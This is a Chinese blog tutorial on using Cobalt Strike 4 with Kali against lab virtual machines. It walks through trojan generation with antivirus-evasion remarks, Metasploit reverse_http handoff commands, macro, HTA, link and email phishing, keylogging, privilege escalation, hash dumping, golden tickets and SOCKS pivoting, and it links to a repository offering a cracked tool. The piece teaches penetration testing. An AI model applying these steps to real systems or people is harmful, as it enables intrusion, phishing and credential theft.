admin管理员组文章数量:1637712
本文中探讨的内容只作为网络安全渗透技术探讨与分享,示例中渗透的IP均为本人虚拟机,不可越过法律与道德的底线进行非法渗透。
软件介绍
Cobalt Strike是一款美国Red Team开发的渗透测试神器,这款工具也是目前红队用的最多一款工具,常被业界人称为CS。因为它拥有多种协议主机上线方式,其他的木马都是走的TCPIP协议,它DNS,SMB等协议它都支持,支持的协议比较多,而且功能也比较全面。集成了提权,凭据导出,端口转发,socket代理,office攻击,文件捆绑,钓鱼等功能,是一款APT攻击工具。
Cobalt Strike最核心的功能是分为客户端和服务端可分布式操作可以协同作战,也就是说只需要一个公网服务器,把CS的服务端放在公网服务器上面,后面大家有密码的情况下都可以连接我的服务端 。控制一台服务器,但我提权能力比较弱,我可以找这方面能力强的一起针对这台服务器进行操作,这是这款工具最强大的功能。
目前其他的远控工具还不具备这种功能,它的运行很简单。
我们打开客户端的配置文件看一下代码。它默认的服务端的端口50050,但是大部分使用时会修改,因为大部分的防火墙会拦截这个端口。后面还有它的证书key。
服务端运行CS
1)将服务端文件丢到Kali系统中解压 cd进入到这文件夹中 执行
./teamserver 10.0.0.200 test
如果执行出现报错看看是不是没给权限
客户端运行CS
打开CS文件夹中cs.bat 输入IP 端口 用户名与密码(测试用的都是test)
如果遇到连接超时的情况,可以检查一下网络适配器 将VM禁用后再重新启用
成功运行
客户端建立监听
添加监听器
这个是它的payload 生产木马就以这个payload生产 别人中了木马反向连接我这个主机 10.0.0.200:2222端口
下面生成木马 针对windows系统有两个选项
带s的是无状态的木马 生产出来的木马运行控制对方的服务器 但是它没有任何行为动作 不会创建服务 容易绕过杀毒软件的行为查杀 因为程序再运行的时候要调用注册表 例如写入到启动项 或者服务里面 无状态木马 开机不会自启动 他没有行为动作 它再运行的时候只在内存里 重启就没了 这样做免杀比较方便
所以一般我们生成木马时 带服务启动 (示例中选择不带s的)
根据系统情况 选择是否64位
选择一个储存地址 我就存到了cs根目录下
此时启动一台windows2003虚拟机 将木马传到虚拟机运行 运行后虚拟机中没有反应 再CS客户端上方已经上线
功能十分强大 可以进入beacon进入命令行操作
输入 ? 回车 可以显示可以使用的命令 例如 ?cd
输入 shell ipconfig (首次使用命令行 回应会比较慢 耐心等一会)
第一次操作完以后 后面就快了 输入shell whoami
至此建立监听成功
但是木马以安装程序的形式留存在目标主机中容易暴露,可以将木马文件做一下修饰和免杀(跑题了 回来单写文章做介绍)
建立VNC远程连接
查看当前网络环境
查看当前网络环境下有多少主机
端口扫描
端口扫描 采用arp lcmp 这两个协议去探测 这两个协议内网很难发现
arp是底层协议 数据链路层的协议
内网下开了3389 的主机
查看当前主机的进程
伪造token值 提权的时候有用 其他的时候没啥用
生成payload
为了方便免杀 可以生成各种语言的payload
MSF联动
借用msf强大的漏洞库 让CS控制的主机瞬间到MSF内
创建一个监听
kali打开msf
msf设置监听模块
use exploit/multi/handler
设置系统 这里客户端用的什么系统 写什么系统 (如果连接不成功 大概率是这里选择的payload 与 监听的payload不匹配)
set payload windows/meterpreter/reverse_http
设置攻击者ip
set lhost 10.0.0.200
成功反弹
把CS的会话迁移到MSF上面 因为MSF有强大的漏洞库 方便提权 内网渗透
CS上面没有漏洞库 内网系统攻击的时候 都要把会话迁移到MSF上面打内网
再MSF上执行一个命令试一下
至此 与MSF上的基础操作没有任何区别了
office钓鱼攻击
复制这些代码
找到word里的宏
“所有的活动模板和文档 ”种完木马以后它会影响电脑里所有的office文件
针对某一个文档 久只选择对应的文档
将刚复制的代码粘贴进来
保存关闭 当有人运行这个文档的时候 就会产长新的会话连接。
这里默认是低 但是如果是中 高 会出现安全提示
禁用 木马不会运行 启用 木马会运行
高版本
安全设置
防范方法:收到可疑文件出现提示“宏”,可以丢到虚拟机里去执行。更严谨的方法执行前做个备份。
忠告:做完这类的实验 一定要把“宏”删除,不然会闹出乌龙事件。
信息收集
将域名缩短【短链接在线生成】或者【站长之家】
粘贴到地址栏 按回车打开的是baidu的网站
打开web日志
可以捕捉到访问网站的主机指纹信息(不会进行攻击)
再做安全测试的时候可以 企业哪个员工访问了这个钓鱼连接 需要提醒该员工提高网络安全意识
再有渗透授权的情况下可以继续攻击 把木马传上去
生成html马
PowerShell 只作用与win7以上的系统
生成后可以进行攻击
文件下载
hta 就是html html的可执行文件 叫hta
http://10.0.0.200:82/download/file.ext
看一下卡里cobaltsreike4目录下 upload目录里有没有刚刚生成的木马文件
下一步进行网页钓鱼
HTTP网页钓鱼
这里https 不行就把s去掉
生成短链接钓鱼 http://i7q/6wAFSS
开个虚拟机 win7以上 这个powershell只有win7系统以上才有 以下不支持
这个马还有一个缺陷 再IE浏览器可以直接执行 其他的还不行 会爆提示 要人为执行
这个是浏览器安全机制 点了下载文件 直接运行 就中招了
win10 edge浏览器
win10 IE浏览器
中招了 看一下键盘记录
邮件钓鱼
将目标邮箱写在记事本中 可以放很多邮箱地址 做实验就放一个
邮件内容可以找一个已有的邮件导出为eml文件
将木马放在附件里 实验里随便放一个压缩包 附件做好免杀
预览一下看看有没有报错 然后发送 大厂邮箱有外链 有可能会被拦截
提权
拿到普通用户权限的会话 对于有些功能会有限制 例如转储哈希值
可以在会话处右键点击提权
这些漏洞可以一个一个试 uac的概率会高一些 成功了会产生一个新的会话
多试几个 可以拿shell whoami 查看权限成功提权后可以获取哈希值 和明文密码
明文密码:
黄金票据制作
有了黄金票据随时可以登录
中转SOCKS代理
双击 复制代理信息 到kali 整个msf 会走SOCKS代理
默认是socks4代理 只能走tcp协议 还有socks5代理 可以走tcp和udp协议 其他的协议都不支持 所以建立连接后不用ping其他的主机 他们之间不支持这个协议
攻击者如果控制了101主机 却控制不了102 103主机 在101主机建立SOCKS4代理 攻击者的流量发给101主机 转发给其他主机 因为他们属于同一交换机 在同一个网络里面 借用101为跳板去攻击102103主机 0203主机回包给01主机 在返回给攻击者
如果想让整个系统走socks代理 就要改它的配置文件
后面的2222我没有改 这个是要根据获取socks代理时
设置的端口号 其他的不用变
========================================================================
如果能看得过去,能否赏个赞收关!
以上是正文干货,下方是拓展示例:
=========================================================================
CS的插件下载安装
GitHub - k8gege/Aggressor: Ladon 911 for Cobalt Strike & Cracked Download,Large Network Penetration Scanner, vulnerability / exploit / detection / MS17010 / password/brute-force/psexec/atexec/sshexec/webshell/smbexec/netcat/osscan/netscan/struts2Poc/weblogicExp
也有命令行操作 这是专门为内网渗透准备的插件
还有中文版 我给大家上传的文件包里包含一个英文原版插件,和汉化版插件,功能挺全面的集成插件,但是一些探测工具相较于专业的C语言写的小工具来讲,效率差一些,感兴趣的可以试一下,仅供学习交流使用,严禁非法渗透。
版权声明:本文标题:[内网渗透]CobaltStrike4在Kali系统中实际应用 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://m.elefans.com/dianzi/1729254676a1192532.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论